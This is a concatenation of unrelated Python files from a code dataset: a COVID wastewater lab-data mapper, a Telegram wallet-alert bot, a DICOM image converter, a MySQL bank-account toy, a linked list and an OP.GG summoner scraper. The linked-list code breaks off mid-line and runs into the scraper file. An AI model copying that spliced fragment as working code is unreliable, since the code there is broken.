setattr(self, attr, static_data[table])\n return static_data\n\n def read(\n self,\n labsheet_path,\n staticdata_path,\n worksheet_name,\n lab_id,\n startdate=None,\n enddate=None,\n ):\n # choose the right map file\n if self.version == 2021:\n map_path = MCGILL_MAP_2021\n col_range = \"A:BV\"\n elif self.version == 2022:\n map_path = MCGILL_MAP_2022\n col_range = \"A:CI\"\n else:\n raise ValueError(f\"Version {self.version} not supported\")\n\n # get the lab data\n with warnings.catch_warnings():\n warnings.filterwarnings(action=\"ignore\")\n lab = pd.read_excel(\n labsheet_path, sheet_name=worksheet_name, header=None, usecols=col_range\n )\n # parse the headers to deal with merged cells and get unique names\n lab.columns = self.get_excel_style_columns(lab)\n\n lab_datatypes = lab.iloc[5].values\n lab = lab.iloc[6:]\n lab = remove_bad_rows(lab)\n lab = self.typecast_lab(lab, lab_datatypes)\n # lab = lab.dropna(how=\"all\")\n mapping = pd.read_csv(map_path, header=0)\n mapping.fillna(\"\", inplace=True)\n mapping = mapping.astype(str)\n label_col_name = \"D\" # sampleID column\n spike_col_name = \"AB\" # spikeID\n lod_value_col = \"BI\" # sars-cov-2 gc/rxn\n sample_date_col = \"B\" # end date\n lab = get_lod(lab, label_col_name, spike_col_name, lod_value_col)\n lab = get_loq(lab)\n lab = self.filter_by_date(lab, sample_date_col, startdate, enddate)\n static_data = self.read_static_data(staticdata_path)\n dynamic_tables = self.parse_sheet(\n mapping, static_data, lab, self.processing_functions, lab_id\n )\n for table_name, table in dynamic_tables.items():\n attr = self.get_attr_from_table_name(table_name)\n table = self.type_cast_table(table_name, table)\n setattr(self, attr, table)\n return\n\n def validates(self):\n return True\n\n\ndef debug_test():\n mapper = McGillMapper(2021, processing_functions=MapperFuncs)\n lab_data = \"/Users/jeandavidt/Library/CloudStorage/OneDrive-UniversitéLaval/Université/Doctorat/COVID/Latest Data/Input/2021/CentrEau-COVID_Resultats_test.xlsx\" # noqa\n static_data = \"/Users/jeandavidt/Library/CloudStorage/OneDrive-UniversitéLaval/Université/Doctorat/COVID/Latest Data/Input/Ongoing/CentrEAU-COVID_Static_Data.xlsx\" # noqa\n sheet_name = \"QC Data Daily Samples (McGill)\"\n lab_id = \"frigon_lab\"\n mapper.read(\n lab_data,\n static_data,\n sheet_name,\n lab_id,\n startdate=None,\n enddate=None,\n )\n print(mapper.ww_measure.loc[mapper.ww_measure[\"qualityFlag\"]])\n qc_quality_checker = QcChecker(2021, date_check=True)\n qc_lab = qc_quality_checker.read_validation(\n mapper, lab_data, \"QC_Compil_STEP (int)\"\n )\n with_flag = qc_lab.ww_measure.loc[qc_lab.ww_measure[\"qualityFlag\"]]\n print(with_flag)\n\n\ndef debug_2021():\n mapper = McGillMapper(2021, processing_functions=MapperFuncs)\n lab_data = \"/Users/jeandavidt/Library/CloudStorage/OneDrive-UniversitéLaval/Université/Doctorat/COVID/Latest Data/Input/2021/CentrEau-COVID_Resultats_Quebec_final.xlsx\" # noqa\n static_data = \"/Users/jeandavidt/Library/CloudStorage/OneDrive-UniversitéLaval/Université/Doctorat/COVID/Latest Data/Input/Ongoing/CentrEAU-COVID_Static_Data.xlsx\" # noqa\n\n sheet_name = \"QC Data Daily Samples (McGill)\"\n lab_id = \"frigon_lab\"\n mapper.read(\n lab_data,\n static_data,\n sheet_name,\n lab_id,\n startdate=None,\n enddate=None,\n )\n print(mapper.ww_measure.loc[mapper.ww_measure[\"qualityFlag\"]])\n qc_quality_checker = QcChecker(2021, date_check=True)\n qc_lab = qc_quality_checker.read_validation(\n mapper, lab_data, \"QC_Compil_STEP (int)\"\n )\n with_flag = qc_lab.ww_measure.loc[qc_lab.ww_measure[\"qualityFlag\"]]\n print(with_flag)\n\n\ndef debug_2022():\n mapper = McGillMapper(2022, processing_functions=MapperFuncs)\n lab_data = \"/Users/jeandavidt/Library/CloudStorage/OneDrive-UniversitéLaval/Université/Doctorat/COVID/Latest Data/Input/2022/CentrEau-COVID_Resultats_Quebec_2022.xlsx\" # noqa\n static_data = \"/Users/jeandavidt/Library/CloudStorage/OneDrive-UniversitéLaval/Université/Doctorat/COVID/Latest Data/Input/Ongoing/CentrEAU-COVID_Static_Data.xlsx\" # noqa\n\n sheet_name = \"QC Data Daily Samples (McGill)\"\n lab_id = \"frigon_lab\"\n mapper.read(\n lab_data,\n static_data,\n sheet_name,\n lab_id,\n startdate=None,\n enddate=None,\n )\n print(mapper.ww_measure.loc[mapper.ww_measure[\"qualityFlag\"]])\n qc_quality_checker = QcChecker(2022, date_check=True)\n qc_lab = qc_quality_checker.read_validation(\n mapper, lab_data, \"QC_Compil_STEP (int)\"\n )\n\n print(qc_lab.ww_measure.loc[qc_lab.ww_measure[\"qualityFlag\"]])\n\n\nif __name__ == \"__main__\":\n with warnings.catch_warnings():\n warnings.filterwarnings(action=\"error\")\n # debug_test()\n debug_2021()\n # debug_2022()\n","repo_name":"modelEAU/ODM-Import","sub_path":"wbe_odm/odm_mappers/mcgill_mapper.py","file_name":"mcgill_mapper.py","file_ext":"py","file_size_in_byte":34808,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"50"} +{"seq_id":"30286781122","text":"import asyncio\nimport logging\nfrom time import sleep\nfrom decimal import Decimal\n\nfrom config.celery import app\nfrom telegram_bot.loader import bot\nfrom wallets.models import WalletChain, Transaction\nfrom wallets.services.one_inch import get_one_inch_tokens\nfrom wallets.services.transactions import get_new_transactions\nfrom aiogram.utils.exceptions import ChatNotFound, RetryAfter\n\nfrom telegram_bot.utils.render import render_link\nfrom telegram_bot.loader import w3\nfrom wallets.utils import get_or_create_token_contract\n\n\ndef render_tx_native_text(tx: Transaction, chain, names):\n value = w3.fromWei(int(tx.value), 'ether')\n text = f'{value} {chain.upper()}({names[chain]}): '\n text += f'{round(value * Decimal(tx.native_price)), 2} USD' if value else ''\n return text\n\n\ndef render_tx_token_text(tx: Transaction, chain, names) -> str:\n token_name = tx.token_contract.symbol if tx.token_contract.symbol else ''\n value = Decimal(int(tx.value) / 10 ** tx.token_contract.decimals) if tx.token_contract.decimals else w3.fromWei(int(tx.value), 'ether')\n link = render_link(tx.token_contract.name, tx.token_contract.token_address, chain, \"token\")\n text = f'{round(value, 6)} {token_name}({link}): '\n text += f'{round(Decimal(tx.token_price) * value, 2)} USD' if tx.token_price else ''\n return text\n\n\ndef render_new_tx_text(tx: Transaction) -> str:\n tx_fee = w3.fromWei(int(tx.tx_fee), 'ether') if tx.tx_fee else ''\n my_address = tx.wallet.address.lower()\n chain = tx.wallet.chain\n names = {'eth': 'Ethereum', 'bsc': 'Binance', 'polygon': 'Polygon(Matic)'}\n text_to_type = {'token': render_tx_token_text, 'native': render_tx_native_text}\n wallet_link = render_link(tx.wallet.description, tx.wallet.address, chain, 'address')\n text = f'{wallet_link}\\n'\n if tx.to_address.lower() == my_address:\n text += f'➕{text_to_type[tx.type](tx, chain, names)}\\n' \\\n f'FROM {render_link(tx.from_address, tx.from_address, chain, \"address\")}\\n'\n elif tx.from_address.lower() == my_address:\n text += f'➖{text_to_type[tx.type](tx, chain, names)}\\n' \\\n f'TO {render_link(tx.to_address, tx.to_address, chain, \"address\")}\\n'\n text += f'TX FEE: {tx_fee} ({round(tx_fee * Decimal(tx.native_price), 2)}) USD\\n' if tx_fee else ''\n text += f'({render_link(\"View on Explorer\", tx.hash, chain, \"tx\")})'\n return text\n\n\nasync def send_message(chat_id, msg):\n await bot.send_message(chat_id, msg, disable_web_page_preview=True)\n\n\n@app.task\ndef new_transactions_notification():\n loop = asyncio.get_event_loop()\n tx_list = get_new_transactions()\n logging.info(f'new transactions {tx_list}')\n for tx in tx_list:\n for i in range(5):\n try:\n loop.run_until_complete(send_message(tx.wallet.user.id, render_new_tx_text(tx)))\n break\n except ChatNotFound:\n pass\n except RetryAfter:\n logging.error('RetryAfter')\n sleep(5)\n\n\n@app.task\ndef get_tokens_info():\n for chain in WalletChain:\n tokens_info = get_one_inch_tokens(chain[0])\n for key, value in tokens_info['tokens'].items():\n get_or_create_token_contract(key, chain[0], name=value.get('name'), symbol=value.get('symbol'),\n decimals=value.get('decimals'))\n","repo_name":"vkhnychenko/BlockchainScanDjangoNinja","sub_path":"wallets/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":3464,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"50"} +{"seq_id":"35786765882","text":"#%% Importando as bibliotecas\n\nimport pydicom as dicom\nimport os\n\n\n#%% Especificando o formato de saida e o diretorio de entrada\n\n# Make it True if you want in PNG format\nPNG = False\n\n# Specify the .dcm folder path\ninput_folder_path = \"Glaucoma/Glaucoma/DICOM-STORAGE/2019/\"\n\n\n#%% Qual metodo de extracao das imagens sera utilizado\n\nmetodo = {1 : \"OpenCV_1\", 2 : \"Matplotlib_1\", 3 : \"PIL_1\", 4 : \"Scipy\"}\n\nn_metodo = 4\n\noutput_folder_path = \"Glaucoma/Glaucoma/Amostragem/\" + metodo[n_metodo] + \"/\"\n\n\n#%% Especificando o diretorio de saida, com base no formato escolhido\n\n# Specify the output jpg/png folder path\nif PNG == True:\n output_folder_path = output_folder_path + \"PNG/\"\nelse:\n output_folder_path = output_folder_path + \"JPEG/\"\n \n\n#%% Criando o diretorio de saida das imagens, caso ainda nao exista\n\ntry:\n os.makedirs(os.path.dirname(output_folder_path))\nexcept FileExistsError:\n print(\"O diretorio '{}' ja foi criado.\\n\".format(output_folder_path))\n\n\n#%% Funcao para salvar em um dicionario o caminho (chave) e os arquivos (valores)\n\n# Setando o contador de imagem\ncount_img = 0\n\ndef dir_walker(root_dir):\n dict_dir = {}\n count = 0\n # Iterando entre o diretorio ano (2019)\n for r0, d0, f0 in os.walk(root_dir):\n if len(d0) > 0:\n for d in d0:\n # Iterando entre os diretorios 'meses'\n for r1, d1, f1 in os.walk(os.path.join(r0, d)):\n if len(d1) > 0:\n d1.sort()\n for dd in d1:\n # Iterando entre os diretorios 'dias'\n for r2, d2, f2 in os.walk(os.path.join(r1, dd)):\n if len(d2) == 0:\n f2.sort()\n dict_dir[r2] = f2\n print(r2)\n count += len(f2)\n else:\n f0.sort()\n dict_dir[r0] = f0\n print(r0)\n count += len(f0)\n \n print(\"Count files:\", count)\n return dict_dir, count\n\n\n#%% Aplicando a funcao para o diretorio de entrada\n \n# Pegando um dicionario 'dir_img', sendo:\n # chave = diretorio_imagens\n # valor = lista com os nomes das imagens\n\ndir_img, count_img = dir_walker(input_folder_path)\n\n\n#%% Criando os diretorios de saida\n\nfor k_dir in dir_img.keys():\n \n ano = k_dir.split(\"/\")[-4]\n mes = k_dir.split(\"/\")[-3]\n dia = k_dir.split(\"/\")[-2]\n \n fim_path = ano + \"-\" + mes + \"-\" + dia + \"/\"\n \n dir_fim = os.path.join(output_folder_path, fim_path)\n\n \n # Criando o diretorio do mes\n try:\n os.makedirs(os.path.dirname(dir_fim))\n print(\"Criado o diretorio final de saida:\", fim_path)\n except FileExistsError:\n print(\"O diretorio '{}' ja foi criado.\\n\".format(dir_fim))\n \n\n#%% Extracao Metodo 1 - OpenCV\n\nimport cv2\n\n# -------------------------- METODO 1 ---------------------------------------\nif n_metodo == 1:\n\n for n, k_dir in enumerate(dir_img.keys()):\n print(\"Dir {}: \\t Startting conversion of path {} ...\".format(n, k_dir))\n for v_dir in dir_img[k_dir]:\n \n img_dicom = os.path.join(k_dir, v_dir)\n # print(img_dicom)\n ds = dicom.dcmread(img_dicom)\n pixel_array_numpy = ds.pixel_array\n \n if PNG == True:\n img_out_name = v_dir.replace('.dcm', '.png')\n else:\n img_out_name = v_dir.replace('.dcm', '.jpg')\n \n img_new = os.path.join(dir_fim, img_out_name)\n cv2.imwrite(img_new, pixel_array_numpy)\n # print(\"Image converted: \\t\", img_new)\n \n print(\"{} files extract with sucessfully!\\n\".format(k_dir))\n\n\n#%% Extracao Metodo 2 - Matplotlib\n \nimport matplotlib.pyplot as plt\n\n# -------------------------- METODO 2 ---------------------------------------\nif n_metodo == 2:\n \n for n, k_dir in enumerate(dir_img.keys()):\n print(\"Dir {}: \\t Startting conversion of path {} ...\".format(n, k_dir))\n for v_dir in dir_img[k_dir]:\n \n img_dicom = os.path.join(k_dir, v_dir)\n # print(img_dicom)\n ds = dicom.dcmread(img_dicom)\n pixel_array_numpy = ds.pixel_array\n \n if PNG == True:\n img_out_name = v_dir.replace('.dcm', '.png')\n else:\n img_out_name = v_dir.replace('.dcm', '.jpg')\n \n img_new = os.path.join(dir_fim, img_out_name)\n # plt.imshow(pixel_array_numpy)\n \n plt.imsave(img_new, pixel_array_numpy)\n \n # print(\"Image converted: \\t\", img_new)\n \n print(\"{} files extract with sucessfully!\\n\".format(k_dir))\n\n\n#%% Extracao Metodo 3 - PIL\n\n# import contrib-pydicom\nfrom pydicom_PIL import show_PIL, save_PIL\n\n# import pydicom.contrib.pydicom_PIL.show_PIL as show_pil\n\n# -------------------------- METODO 3 ---------------------------------------\nif n_metodo == 3:\n \n for n, k_dir in enumerate(dir_img.keys()):\n print(\"Dir {}: \\t Startting conversion of path {} ...\".format(n, k_dir))\n for v_dir in dir_img[k_dir]:\n \n img_dicom = os.path.join(k_dir, v_dir)\n print(img_dicom)\n ds = dicom.read_file(img_dicom)\n \n # show_PIL(ds)\n \n if PNG == True:\n img_out_name = v_dir.replace('.dcm', '.png')\n else:\n img_out_name = v_dir.replace('.dcm', '.jpg')\n \n img_new = os.path.join(dir_fim, img_out_name)\n # plt.imshow(pixel_array_numpy)\n \n save_PIL(ds, img_new)\n \n # plt.imsave(img_new, pixel_array_numpy)\n \n # print(\"Image converted: \\t\", img_new)\n \n print(\"{} files extract with sucessfully!\\n\".format(k_dir))\n\n\n#%% Extracao Metodo 4: Usando o Scipy\n\nimport matplotlib.pyplot as plt\nimport scipy.misc\n# import pandas as pd\n# import numpy as np\n\n# -------------------- METODO 4 ---------------------------\nif n_metodo == 4:\n images_dicom = dir_img[input_folder_path]\n \n for img_dicom_name in images_dicom:\n input_image = os.path.join(input_folder_path, img_dicom_name)\n \n output_image_jpg = img_dicom_name.replace('.dcm', '.jpg')\n output_image = os.path.join(output_folder_path, output_image_jpg)\n \n ds = dicom.read_file(input_image)\n img = ds.pixel_array\n r = img[0]\n \n plt.imshow(img)\n # scipy.misc.imsave(output_image, img)\n \n print(\"Saving the {} at {} path.\".format(output_folder_path, output_image_jpg))\n \n\n \n ","repo_name":"Mat-Bit/tcc-udesc","sub_path":"scripts/1_image_converter_testes.py","file_name":"1_image_converter_testes.py","file_ext":"py","file_size_in_byte":6836,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"74631969115","text":"import mysql.connector\r\nfrom datetime import datetime\r\n\r\nmydb = mysql.connector.connect(\r\n host=\"localhost\", user=\"root\", password=\"password\", database=\"student\")\r\n\r\nmycursor = mydb.cursor()\r\n\r\n# mycursor.execute(\"CREATE TABLE bank_account (id INT AUTO_INCREMENT PRIMARY KEY, account_no VARCHAR(255), account_holder VARCHAR(255), balance INT, created_at DATETIME)\")\r\n\r\nclass BankAccount:\r\n def __init__(self, account_no, account_holder):\r\n self.account_no = account_no\r\n self.account_holder = account_holder\r\n self.balance = 0\r\n\r\n def deposit(self, amount):\r\n self.balance += amount\r\n now = datetime.now()\r\n created_at = now.strftime('%Y-%m-%d %H:%M:%S')\r\n sql = \"INSERT INTO bank_account (account_no, account_holder, balance, created_at) VALUES (%s, %s, %s, %s)\"\r\n val = (self.account_no, self.account_holder, self.balance, created_at)\r\n mycursor.execute(sql, val)\r\n mydb.commit()\r\n\r\n def withdraw(self, amount):\r\n if amount > self.balance:\r\n print(\"Insufficient balance\")\r\n else:\r\n self.balance -= amount\r\n now = datetime.now()\r\n created_at = now.strftime('%Y-%m-%d %H:%M:%S')\r\n sql = \"INSERT INTO bank_account (account_no, account_holder, balance, created_at) VALUES (%s, %s, %s, %s)\"\r\n val = (self.account_no, self.account_holder,\r\n self.balance, created_at)\r\n mycursor.execute(sql, val)\r\n mydb.commit()\r\n print(\"Amount Withdrawl Successfully...\")\r\n\r\n def get_balance(self):\r\n return self.balance\r\n\r\n\r\n# account = BankAccount('67549938553', 'Dhananjay Sable')\r\n# account.deposit(1000)\r\n# account.withdraw(500)\r\n# print(\"Account balance:\", account.get_balance())\r\n\r\n\r\nwhile True:\r\n print(\"To Create Account press (1)\")\r\n print(\"To Deposit Amount press (2)\")\r\n print(\"To Withdraw Amount press (3)\")\r\n print(\"To Quit press (4)\")\r\n user = int(input(\"Enter Your Option Number : \"))\r\n if user == 1:\r\n acno = int(input(\"Enter Your Account Number : \"))\r\n print(f\"Your Account No is {acno}\")\r\n name = input(\"Enter Your Name : \")\r\n result = BankAccount(acno, name)\r\n print(f\"{name} Your Account is Created Successfully.\")\r\n elif user == 2:\r\n amount=int(input(\"Enter Amount for Deposit : \"))\r\n result.deposit(amount)\r\n print(\"Amount Deposited Successfully..\")\r\n elif user == 3:\r\n amountw=int(input(\"Enter Amount for Withdrawl : \"))\r\n result.withdraw(amountw)\r\n \r\n else:\r\n break\r\n","repo_name":"dhananjay370/python","sub_path":"TryProject.py","file_name":"TryProject.py","file_ext":"py","file_size_in_byte":2606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"18677115031","text":"class Node:\n def __init__(self, data):\n self.data = data\n self.next = None\n\n\nclass Linkedlist:\n def __init__(self):\n self.head = None\n \n def append(self, a):\n new_node = Node(a[0])\n if self.head is None:\n self.head = new_node\n\n last = self.head\n for i in range(1, len(a)):\n new_node = Node(a[i])\n\n last.next = new_node\n last = new_node\n \n \n\n def reverse(self,head,k):\n if head==None:\n return None\n prev = None\n next = None\n current = head\n count = 0\n \n while current is not None and count/?&limit=20&hl=en_US&game_type=total\n # https://www.op.gg/_next/data/MU383OsSMb6hg5che0Y88/en_US/multisearch/na.json?summoners=Handofthecouncil%2CTired%2Bmid%2Blaner%2Cabc%2CColbyfaulkn1%2Ccolbyfaulkn%2Cabcd%2Cabcde%2Cabcdef%26region%3Dna®ion=na\n \n \n def __init__(self, summoner_id: str | None = None, region = Region.NA) -> None:\n self._summoner_id = summoner_id\n self._region = region\n self._api_url = f\"https://op.gg/api/v1.0/internal/bypass/summoners/{self.region}/{self.summoner_id}/summary\"\n self._headers = { \n \"User-Agent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36\" \n }\n self._all_champions = None\n self._all_seasons = None\n\n # ===== SETUP START =====\n logging.root.name = 'OPGG.py'\n\n logging.basicConfig(\n filename=f'./logs/opgg_{datetime.now().strftime(\"%Y-%m-%d\")}.log',\n filemode='a+', \n format='[%(asctime)s][%(name)-22s][%(levelname)-7s] : %(message)s', \n datefmt='%d-%b-%y %H:%M:%S',\n level=logging.INFO\n )\n\n if not os.path.exists('./logs'):\n logging.info(\"Creating logs directory...\")\n os.mkdir('./logs')\n else:\n # remove empty log files\n for file in os.listdir('./logs'):\n if os.stat(f\"./logs/{file}\").st_size == 0 and file != f'opgg_{datetime.now().strftime(\"%Y-%m-%d\")}.log':\n logging.info(f\"Removing empty log file: {file}\")\n os.remove(f\"./logs/{file}\")\n # ===== SETUP END =====\n \n # allow the user to interact with the logger\n self._logger = logging.getLogger(\"OPGG.py\") \n \n # at object creation, setup and query the cache\n self._cacher = Cacher()\n self._cacher.setup()\n \n # check if champions are cached, if they are, populate self.all_champions\n \n \n # check if seasons are cached, if they are, populate self.all_seasons\n \n \n self.logger.info(\n f\"OPGG.__init__(summoner_id={self.summoner_id}, \" \\\n f\"region={self.region}, \" \\\n f\"api_url={self.api_url}, \" \\\n f\"headers={self.headers}, \" \\\n f\"all_champions={self.all_champions}, \" \\\n f\"all_seasons={self.all_seasons})\"\n )\n \n \n @property\n def logger(self) -> logging.Logger:\n \"\"\"\n A `Logger` object representing the logger instance.\n \n The logging level is set to `INFO` by default.\n \"\"\"\n return self._logger\n \n @property\n def summoner_id(self) -> str:\n \"\"\"\n A `str` representing the summoner id. (Riot API)\n \"\"\"\n return self._summoner_id\n \n @summoner_id.setter\n def summoner_id(self, value: str) -> None:\n self._summoner_id = value\n self.refresh_api_url()\n \n @property\n def region(self) -> str:\n \"\"\"\n A `str` representing the region to search in.\n \"\"\"\n return self._region\n \n @region.setter\n def region(self, value: str) -> None:\n self._region = value\n self.refresh_api_url()\n \n @property\n def api_url(self) -> str:\n \"\"\"\n A `str` representing the api url to send requests to. (OPGG API)\n \"\"\"\n return self._api_url\n \n @api_url.setter\n def api_url(self, value: str) -> None:\n self._api_url = value\n \n @property\n def headers(self) -> dict:\n \"\"\"\n A `dict` representing the headers to send with the request.\n \"\"\"\n return self._headers\n \n @headers.setter\n def headers(self, value: dict) -> None:\n self._headers = value\n \n @property\n def all_champions(self) -> list[Champion]:\n \"\"\"\n A `list[Champion]` objects representing all champions in the game.\n \"\"\"\n return self._all_champions\n \n @all_champions.setter\n def all_champions(self, value: list[Champion]) -> None:\n self._all_champions = value\n \n @property\n def all_seasons(self) -> list[SeasonInfo]:\n \"\"\"\n A `list[SeasonInfo]` objects representing all seasons in the game.\n \"\"\"\n return self._all_seasons\n \n @all_seasons.setter\n def all_seasons(self, value: list[SeasonInfo]) -> None:\n self._all_seasons = value\n \n @property\n def cacher(self) -> Cacher:\n \"\"\"\n A `Cacher` object representing the summoner_id cacher.\n \"\"\"\n return self._cacher\n \n def refresh_api_url(self) -> None:\n \"\"\"\n A method to refresh the api url with the current summoner id and region.\n \"\"\"\n self.api_url = f\"https://op.gg/api/v1.0/internal/bypass/summoners/{self.region}/{self.summoner_id}/summary\"\n \n self.logger.debug(f\"self.refresh_api_url() called... self.api_url = {self.api_url}\")\n \n \n def get_summoner(self) -> Summoner:\n \"\"\"\n A method to get data from the OPGG API and form a Summoner object.\n \n General flow:\\n\n -> Send request to OPGG API\\n\n -> Parse data from request (jsonify)\\n\n -> Loop through data and form the summoner object.\n \n ### Returns:\n `Summoner`: A Summoner object representing the summoner.\n \"\"\"\n self.logger.info(f\"Sending request to OPGG API... (API_URL = {self.api_url}, HEADERS = {self.headers})\")\n req = requests.get(self.api_url, headers=self.headers)\n \n previous_seasons: list[Season] = []\n league_stats: list[LeagueStats] = []\n most_champions: list[ChampionStats] = []\n recent_game_stats: list[Game] = []\n \n if req.status_code == 200:\n self.logger.info(f\"Request to OPGG API was successful, parsing data (Content Length: {len(req.text)})...\")\n content = json.loads(req.text)[\"data\"]\n else:\n req.raise_for_status()\n \n try: \n for season in content[\"summoner\"][\"previous_seasons\"]:\n tmp_season_info = None\n if self.all_seasons:\n for _season in self.all_seasons:\n if _season.id == season[\"season_id\"]:\n tmp_season_info = _season\n break\n \n previous_seasons.append(Season(\n season_id = tmp_season_info,\n tier_info = Tier(\n tier = season[\"tier_info\"][\"tier\"],\n division = season[\"tier_info\"][\"division\"],\n lp = season[\"tier_info\"][\"lp\"],\n tier_image_url = season[\"tier_info\"][\"tier_image_url\"],\n border_image_url = season[\"tier_info\"][\"border_image_url\"]\n ),\n created_at = season[\"created_at\"]\n ))\n \n for league in content[\"summoner\"][\"league_stats\"]:\n league_stats.append(LeagueStats(\n queue_info = QueueInfo(\n id = league[\"queue_info\"][\"id\"],\n queue_translate = league[\"queue_info\"][\"queue_translate\"],\n game_type = league[\"queue_info\"][\"game_type\"]\n ),\n tier_info = Tier(\n tier = league[\"tier_info\"][\"tier\"],\n division = league[\"tier_info\"][\"division\"],\n lp = league[\"tier_info\"][\"lp\"],\n tier_image_url = league[\"tier_info\"][\"tier_image_url\"],\n border_image_url = league[\"tier_info\"][\"border_image_url\"]\n ),\n win = league[\"win\"],\n lose = league[\"lose\"],\n is_hot_streak = league[\"is_hot_streak\"],\n is_fresh_blood = league[\"is_fresh_blood\"],\n is_veteran = league[\"is_veteran\"],\n is_inactive = league[\"is_inactive\"],\n series = league[\"series\"],\n updated_at = league[\"updated_at\"]\n ))\n \n for champion in content[\"summoner\"][\"most_champions\"][\"champion_stats\"]:\n tmp_champ = None\n if self.all_champions:\n for _champion in self.all_champions:\n if _champion.id == champion[\"id\"]:\n tmp_champ = _champion\n break\n \n most_champions.append(ChampionStats(\n champion = tmp_champ,\n play = champion[\"play\"],\n win = champion[\"win\"],\n lose = champion[\"lose\"],\n kill = champion[\"kill\"],\n death = champion[\"death\"],\n assist = champion[\"assist\"],\n gold_earned = champion[\"gold_earned\"],\n minion_kill = champion[\"minion_kill\"],\n turret_kill = champion[\"turret_kill\"],\n neutral_minion_kill = champion[\"neutral_minion_kill\"],\n damage_dealt = champion[\"damage_dealt\"],\n damage_taken = champion[\"damage_taken\"],\n physical_damage_dealt = champion[\"physical_damage_dealt\"],\n magic_damage_dealt = champion[\"magic_damage_dealt\"],\n most_kill = champion[\"most_kill\"],\n max_kill = champion[\"max_kill\"],\n max_death = champion[\"max_death\"],\n double_kill = champion[\"double_kill\"],\n triple_kill = champion[\"triple_kill\"],\n quadra_kill = champion[\"quadra_kill\"],\n penta_kill = champion[\"penta_kill\"],\n game_length_second = champion[\"game_length_second\"]\n ))\n \n for game in content[\"recent_game_stats\"]:\n tmp_champ = None\n if self.all_champions:\n for _champion in self.all_champions:\n if _champion.id == game[\"champion_id\"]:\n tmp_champ = _champion\n break\n \n recent_game_stats.append(Game(\n game_id = game[\"game_id\"],\n champion = tmp_champ,\n kill = game[\"kill\"],\n death = game[\"death\"],\n assist = game[\"assist\"],\n position = game[\"position\"],\n is_win = game[\"is_win\"],\n is_remake = game[\"is_remake\"],\n op_score = game[\"op_score\"],\n op_score_rank = game[\"op_score_rank\"],\n is_opscore_max_in_team = game[\"is_opscore_max_in_team\"],\n created_at = game[\"created_at\"]\n ))\n except Exception as e:\n self.logger.warn(f\"Error parsing some summoner data... (Could be that they just come in as nulls): {e}\")\n pass\n \n \n return Summoner(\n id = content[\"summoner\"][\"id\"],\n summoner_id = content[\"summoner\"][\"summoner_id\"],\n acct_id = content[\"summoner\"][\"acct_id\"],\n puuid = content[\"summoner\"][\"puuid\"],\n name = content[\"summoner\"][\"name\"],\n internal_name = content[\"summoner\"][\"internal_name\"],\n profile_image_url = content[\"summoner\"][\"profile_image_url\"],\n level = content[\"summoner\"][\"level\"],\n updated_at = content[\"summoner\"][\"updated_at\"],\n renewable_at = content[\"summoner\"][\"renewable_at\"],\n previous_seasons = previous_seasons,\n league_stats = league_stats,\n most_champions = most_champions,\n recent_game_stats = recent_game_stats\n )\n \n \n def search(self, summoner_names: str | list[str], region = Region.NA) -> list[Summoner]:\n \"\"\"\n Search for a single or multiple summoner(s) on OPGG.\n\n ### Args:\n summoner_names : `str | list[str]`\n Pass either a `str` (comma seperated or single) or `str` list of summoner names.\n \n region : `Region, optional`\n Pass the region you want to search in. Defaults to \"NA\".\n\n ### Returns:\n `list[Summoner]` : A list of summoner objects.\n \"\"\"\n \n if OPGG.cached_page_props:\n page_props = OPGG.cached_page_props\n self.logger.info(\"Using cached page props...\")\n else:\n # no comma here would result in bug, no ',' found in str\n if isinstance(summoner_names, str): summoner_names = summoner_names.split(\",\")\n \n # General flow of cache retrieval:\n # 1. Pull from cache db\n # -> If found, add to list of cached summoner ids, and below iterate over and set the summoner id property\n # -> As an extension of the above, these requests would go directly to the api to pull summary/full data\n # -> If not found, add to list of summoner names to query\n # 2. Build the summoner objects accordingly\n cached_summoner_ids = []\n uncached_summoners = []\n \n for summoner_name in summoner_names:\n cached_id = self.cacher.get_summoner_id(summoner_name)\n if cached_id:\n cached_summoner_ids.append(cached_id)\n else:\n uncached_summoners.append(summoner_name)\n \n # pass only uncached summoners to get_page_props()\n # todo: DEBUG, THIS IS GOIGN TO PING OUT EACH TIME FOR NOW\n # page_props = self.get_page_props(uncached_summoners, region)\n page_props = self.get_page_props(summoner_names, region)\n self.logger.debug(page_props)\n \n OPGG.cached_page_props = page_props\n self.logger.info(f\"No cache for {len(uncached_summoners)} summoners: {uncached_summoners}, fetching... (using get_page_props() site scraper)\")\n self.logger.info(f\"Cache found for {len(cached_summoner_ids)} summoners: {cached_summoner_ids}, fetching... (using get_summoner() api)\")\n \n # these cross reference the page prop season/champ ids to build out season/champ objects\n # todo: build this into caching system\n self.all_seasons = self.get_all_seasons(self.region, page_props)\n self.all_champions = self.get_all_champions(self.region, page_props)\n \n # TODO: this is just for testing, cache the champs.\n self.cacher.insert_all_champs(self.all_champions)\n \n # todo: if more than 5 summoners are passed, break into 5s and iterate over each set\n # note: this would require calls to the refresh_api_url() method each iteration?\n summoners = []\n for id in page_props['summoners']:\n self.summoner_id = id[\"summoner_id\"]\n summoner = self.get_summoner()\n summoners.append(summoner) \n self.logger.info(f\"Summoner object built for: {summoner.name} ({summoner.summoner_id}), caching...\")\n self.cacher.insert_summoner(summoner.name, summoner.summoner_id)\n \n # cached summoners go straight to api\n # for cached_id in cached_summoner_ids:\n # self.summoner_id = cached_id\n # summoner = self.get_summoner()\n # summoners.append(summoner)\n # self.logger.info(f\"Summoner object built for: {summoner.name} ({summoner.summoner_id})\")\n \n return summoners\n\n\n @staticmethod\n def get_page_props(summoner_names: str | list[str] = \"abc\", region = Region.NA) -> dict:\n \"\"\"\n Get the page props from OPGG. (Contains data such as summoner info, champions, seasons, etc.)\n \n ### Parameters\n summoner_names : `str | list[str], optional`\n Pass a single or comma separated `str` or a list of summoner names.\\n\n Note: Default is \"abc\", as this can be any valid summoner if you just want page props. (All champs, seasons, etc.)\n \n region : `Region, optional`\n Pass the region you want to search in. Default is \"NA\".\n\n ### Returns\n `dict` : Returns a dictionary with the page props.\n \"\"\"\n \n if isinstance(summoner_names, list): summoner_names = \",\".join(summoner_names)\n \n url = 